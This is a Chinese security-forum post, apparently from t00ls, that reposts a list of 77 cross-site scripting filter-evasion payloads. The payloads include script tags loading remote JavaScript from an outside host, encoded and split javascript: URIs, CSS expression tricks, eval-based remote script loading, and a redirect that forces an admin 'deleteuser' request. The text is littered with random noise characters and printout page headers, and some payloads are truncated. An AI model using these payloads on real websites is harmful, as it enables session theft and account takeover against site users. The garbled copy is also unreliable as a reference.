貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
s K5 c- S$ g8 x(1)普通的XSS JavaScript注入
^* r* J4 k; u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& t/ \, |. [8 F* n, m6 M3 W' U9 n(2)IMG标签XSS使用JavaScript命令
! A* r' d, r9 {<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" ]: k9 q. C: t8 M! U0 `0 O(3)IMG标签无分号无引号
) _& H+ x" z- c" ^6 h* L<IMG SRC=javascript:alert(‘XSS’)>! W! i. q3 }3 M1 w5 a5 Q& J+ n
(4)IMG标签大小写不敏感
3 Z* a2 q' A* y$ J% S, |<IMG SRC=JaVaScRiPt:alert(‘XSS’)>- C/ P# X% y0 x( }; N
(5)HTML编码(必须有分号)
5 T* M( w/ c- x5 r8 @$ l7 u. ^<IMG SRC=javascript:alert(“XSS”)>* ]0 Y3 Z6 P8 j8 I, m8 D; N; O
(6)修正缺陷IMG标签
( p* s. v( U# C* \4 i5 r<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, [7 \( e; Y- \# [4 C
; k8 E5 Y$ _: k! T1 X" S# e
7 H% N6 h- g8 b W# Z(7)formCharCode标签(计算器)4 J! s& X4 ^3 F
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! Y% ~: A" V! C. _(8)UTF-8的Unicode编码(计算器)' K$ b4 _+ Z/ P7 S6 x6 U
<IMG SRC=jav..省略..S')>/ w5 @2 ]1 G$ S0 u) \
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 S0 \/ z; ?# I. \$ y
<IMG SRC=jav..省略..S')>8 L( m. O8 o8 X
(10)十六进制编码也是没有分号(计算器), |: q; T; r0 n* W$ y: m
<IMG SRC=java..省略..XSS')>
! k& s* |, s, Y# ~(11)嵌入式标签,将Javascript分开1 o, |7 `9 _& o t
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ S" _" q) e; m! @6 `
(12)嵌入式编码标签,将Javascript分开' V( j3 q+ `; ]* l3 C: C
<IMG SRC=”jav ascript:alert(‘XSS’);”>. |" a! b& e4 r" ~
(13)嵌入式换行符3 y) a# F1 ?4 M8 Q( k# u
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 f9 `7 ~- l; j) C1 F$ B. x
(14)嵌入式回车1 j. _4 q4 E6 I* B, c" }
<IMG SRC=”jav ascript:alert(‘XSS’);”>* U, J; B) Z2 h& u
(15)嵌入式多行注入JavaScript,这是XSS极端的例子# ~( C/ B9 s7 j1 [0 _' \$ P
<IMG SRC=”javascript:alert(‘XSS‘)”>
( B" r% W( T0 @- @# e8 G(16)解决限制字符(要求同页面)
, d, _) Q6 z/ z$ r( |<script>z=’document.’</script># D5 ^. Q* {* F) B1 Q( v
<script>z=z+’write(“‘</script>! Z* B& C: Y1 l/ R
<script>z=z+’<script’</script>; _7 X* J- N* T3 K0 i2 f
<script>z=z+’ src=ht’</script>" R/ L8 j! {: V D8 ]
<script>z=z+’tp://ww’</script>
5 C2 I2 g& ]+ G<script>z=z+’w.shell’</script>9 H1 D" S2 U, _; m9 t
<script>z=z+’.net/1.’</script>
6 N. t/ S+ W6 t<script>z=z+’js></sc’</script>
% @6 U0 K, A1 J7 A, |<script>z=z+’ript>”)’</script>
* E0 N$ W# p& w/ K( L<script>eval_r(z)</script>
0 U) ?# ~4 J5 O(17)空字符12-7-1 T00LS - Powered by Discuz! Board$ p. `/ j4 o( L) C* q; p
https://www.t00ls.net/viewthread ... table&tid=15267 2/66 N+ |( J- W: c }* Q7 f! d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 x+ `% L: E [; z& X/ }* W' v/ {
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用/ }+ A- O2 D" Q6 `! l$ W1 l
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
& E2 V* G3 s P9 s7 X2 t$ t$ b9 D% M(19)Spaces和meta前的IMG标签: \: o7 W+ Y+ U% @8 x( e7 G" r
<IMG SRC=” javascript:alert(‘XSS’);”>6 E) v! @0 a2 i; {
(20)Non-alpha-non-digit XSS$ ^( x. X. h2 V# N9 o! S
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; n2 d* H0 }4 [
(21)Non-alpha-non-digit XSS to 2. X' v8 a2 S& a' V. H
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 L3 c$ s" R; P& p8 h: U# {(22)Non-alpha-non-digit XSS to 34 h$ {3 n4 h7 M5 V' e5 p
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>7 U& j) n3 x) ?' b6 S7 B
(23)双开括号
# G" J" X4 ^. [1 l" `) R4 P<<SCRIPT>alert(“XSS”);//<</SCRIPT>" w0 R3 i. I. h! f+ k
(24)无结束脚本标记(仅火狐等浏览器)* j* c0 d/ i1 ?" T
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' p0 I2 i4 L/ J0 ^) P/ b% o t
(25)无结束脚本标记2) C7 O5 f' m: g& a* a. b
<SCRIPT SRC=//3w.org/XSS/xss.js>
+ |3 p e5 e* F(26)半开的HTML/JavaScript XSS& B( T# j2 d. o* s4 N
<IMG SRC=”javascript:alert(‘XSS’)”
7 i0 w! \8 f. `3 x(27)双开角括号
. p+ u k' I6 A2 r* ]" @% C. [0 _8 T6 D<iframe src=http://3w.org/XSS.html <
& b9 G P$ z) t7 r) r# X t6 }(28)无单引号 双引号 分号
" q0 H- O" x2 w. w<SCRIPT>a=/XSS/2 y# g2 ?7 w, D8 w" e P; \
alert(a.source)</SCRIPT># T% ~" y9 R8 l4 u$ C9 p, ?0 m5 m
(29)换码过滤的JavaScript. Z4 r1 y. l E _
\”;alert(‘XSS’);//+ D2 }5 W" L+ ^" K" [ F* R& \* `
(30)结束Title标签
1 J" o! c1 _3 D& B3 [: @</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; ^7 l3 ]2 Y( g: @8 m(31)Input Image
5 ^, K. U. j# U9 n3 @ _" b& K<INPUT SRC=”javascript:alert(‘XSS’);”>) L) L ?9 J4 `9 R: \
(32)BODY Image
0 w0 m$ y2 @1 |: M i<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
$ w! d# R% [; h1 ?(33)BODY标签7 c; W" [1 W, g( l. u
<BODY(‘XSS’)>4 Q4 d7 R0 ?, ~0 L
(34)IMG Dynsrc( Y, f- S7 B- _" Y- [) @
<IMG DYNSRC=”javascript:alert(‘XSS’)”>2 ^% X4 d# R7 z3 D; P: }: A- Z
(35)IMG Lowsrc7 u7 d+ s0 K8 B+ S! V
<IMG LOWSRC=”javascript:alert(‘XSS’)”>$ f, P P/ o5 u% G* a
(36)BGSOUND7 G1 w3 L* z* O, K
<BGSOUND SRC=”javascript:alert(‘XSS’);”>. i5 t& S" [/ q6 z9 r1 e# `- B
(37)STYLE sheet
1 z, n1 g4 c; @: e8 j' S<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
5 w- n( U7 R: [0 h& l& e' G(38)远程样式表
) X( e" s( V/ D F7 i<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
# z7 U5 f/ H* T- k(39)List-style-image(列表式)
1 G" r& V" U' I<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS8 H: J. J/ X! d- R8 y
(40)IMG VBscript
3 H! p& K* t6 i<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 ?9 d, D/ I9 }/ {" ?& x(41)META链接url: q9 `8 |# F }* E9 V4 k# [6 r
5 Z7 u! q6 W0 f! u& n
. d4 C& E$ g8 J* {6 L& O& p2 s<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 @8 Z. T" V; v: dURL=http://;URL=javascript:alert(‘XSS’);”>
7 g+ \; v& f0 m& f/ r' A9 R6 \(42)Iframe
- }+ J! i2 C E3 |4 N5 s: ?: ?- _4 o<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 x2 A- Y& r& R8 U0 W' G(43)Frame5 n3 ~7 T4 [: b! ~. W* g$ C
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
: u A& i# x, F# bhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
# H# E1 t, g4 Y" a(44)Table8 Y% ?' E: g6 l7 V! u
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>( B a* M% B. S4 }: m. X' `2 N
(45)TD
6 [1 I) x; O; O$ i5 j0 ]<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 q: I- Q7 t( u# B(46)DIV background-image
2 w$ F% S. i" g( \& ~: r<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' A( U* N1 e4 E( \% }+ G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
( I F: F' k. g! b$ I8&13&12288&65279). v0 b) S+ n0 i
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; B5 d. F+ d. U& z- A( W" e(48)DIV expression
" h) g3 g. v6 f- {& n# F; {! U<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
# h' D4 E5 t6 C(49)STYLE属性分拆表达
. f5 m/ ]2 W0 i<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>. _9 _0 X. u* @
(50)匿名STYLE(组成:开角号和一个字母开头): a- ?% U7 I, ]
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>6 N& R, M$ S: N
(51)STYLE background-image- l4 x; ?& j [( k1 ?( l
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
* [! }+ B _# D) g* s; WCLASS=XSS></A>
% m& G, _' p- S% t2 G(52)IMG STYLE方式
; a- ~. P) f' r9 C0 Gexppression(alert(“XSS”))’>3 K6 S) I# Y7 c5 v
(53)STYLE background
+ ^: K" G0 k+ n, Z% [7 U/ e<STYLE><STYLE& H: Y( _2 m; E/ j$ D7 g
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
0 g) c9 f/ X: ](54)BASE* I3 N2 I& p; E* n- A [1 c- g: t
<BASE HREF=”javascript:alert(‘XSS’);//”>
! O+ _ ^3 i3 [; [9 ~6 Q, p(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
. o- S6 m' I0 L9 y; h6 d2 F- N& k0 k# n<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
0 F ~# j9 W& J3 O(56)在flash中使用ActionScrpt可以混进你XSS的代码
3 w: d m/ H5 {8 j& V+ W. V ya=”get”;
Q0 q- u: Z( T. W$ Y) H: g0 Ub=”URL(\”";
3 c& F& Z% K% S% M) dc=”javascript:”;
0 F v' m7 ~ w5 p) F( qd=”alert(‘XSS’);\”)”;4 X5 k& X! H5 e
eval_r(a+b+c+d);2 j. C3 N. r; S/ U2 [# y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
6 o6 o4 R3 R1 [+ w' E4 Z<HTML xmlns:xss># T' A: |' n7 @! h' K$ ?) \6 q p
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
3 T4 N8 \- W$ j d0 ~& x# g |<xss:xss>XSS</xss:xss>
6 ]5 v2 d; t/ l( e0 y* [. K</HTML>( o% a: c$ q7 M3 `$ l2 a
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; ~% m6 q, r* U<SCRIPT SRC=””></SCRIPT>" u. c W3 G# A3 }" Z g8 \" I, i
(59)IMG嵌入式命令,可执行任意命令3 u7 ^+ u& x1 X3 F1 a
<IMG SRC=”http://www.XXX.com/a.php?a=b”>4 W3 [. ~+ j+ ]2 t' \3 J' {! R3 O
(60)IMG嵌入式命令(a.jpg在同服务器)
% Y/ Q5 z. @" G( pRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
$ b* R2 a+ G5 d) M* f! z- t(61)绕符号过滤
/ f; a5 p* \3 P. W0 [<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
" Z5 G2 N4 ^2 M+ |6 ~) u1 }2 X) z/ |(62)4 }. O) e* \ d
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' I( b+ C: a- I(63)! {7 d2 c* g# o" |! U
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& ^# }; d/ L" S3 T( T& @) c(64)
5 w* ~% b9 @/ K3 q<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
- ]- G& q; h9 E' ^(65) P+ f8 A0 b( y! D5 e
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>" z X+ Y( S* e
(66)12-7-1 T00LS - Powered by Discuz! Board1 s3 R6 o* a7 ]+ [% P
https://www.t00ls.net/viewthread ... table&tid=15267 4/6! T; k8 \' ] S& B- X1 X/ z
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 O$ z& d/ o# \/ F, Z
(67)
$ i) R. s% F# @, ~0 r* Z<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
/ L+ E! c l0 A) `" |% N</SCRIPT>
, U! |0 ~8 b+ S* ]0 k(68)URL绕行6 ~6 ~$ z: ~ j$ o# Y3 T* R8 E
<A HREF=”http://127.0.0.1/”>XSS</A>
# T/ t/ X7 u. m9 B(69)URL编码# ^2 a1 D; |+ E7 C6 t
<A HREF=”http://3w.org”>XSS</A>
7 n' a/ k9 a. Z; J) K% R, @(70)IP十进制# A. x: p) z6 s0 j0 Y" N
<A HREF=”http://3232235521″>XSS</A>7 S2 X4 d ~7 t _: @; |' l9 ?
(71)IP十六进制
t2 h( Y( V7 B: l<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A># G4 D( o* N$ S) w/ c% @
(72)IP八进制: Z7 a/ z# E! o* M: I
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
) v3 ^; [8 e9 n(73)混合编码
/ V9 t0 s, q. ?<A HREF=”h
) b1 Q7 ^. W; b3 Itt p://6 6.000146.0×7.147/”">XSS</A>
0 o$ X- V# y5 t" I8 H7 T(74)节省[http:]+ ^2 \. z6 M) y, ~7 |
<A HREF=”//www.google.com/”>XSS</A>
2 ?( r ~! S, o& @ C& W9 R(75)节省[www]9 L1 w' t7 X& R( }$ {* s( T
<A HREF=”http://google.com/”>XSS</A>& u* C0 n& Q/ D8 N9 Y- F& K
(76)绝对点绝对DNS
) P# ?9 C, _) p* x% r! S) ]# I5 R- Y<A HREF=”http://www.google.com./”>XSS</A>8 Z( g$ c3 s# i5 q0 L
(77)javascript链接
; E% n d {7 B" b( c! H<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>8 {, ^! P9 E1 n8 t
' H% k$ w9 E/ o2 Q- F
原文地址:http://fuzzexp.org/u/0day/?p=14
, x' \7 }1 Z4 @+ \) I l
. V. o0 e7 B: f" ?0 V$ s+ a |
发表于 2013-4-19 19:22:37
收藏
支持
反对